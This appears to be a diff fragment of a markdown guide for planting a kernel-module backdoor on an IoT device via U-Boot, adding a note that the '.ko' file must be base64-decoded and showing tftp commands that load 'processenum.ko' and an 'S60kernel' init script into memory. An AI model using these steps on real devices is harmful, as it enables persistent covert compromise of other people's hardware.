kymb0/IoT/tftp_backdoor/uboot_backdoorfs.md

 ### FOR kernel backdoor:

-same steps as above in addition to the below changes:
+same steps as above in addition to the below changes (the `.ko` file must be converted back from b64):
 ```
 tftp 0x63000000 processenum.ko
 tftp 0x65000000 S60kernel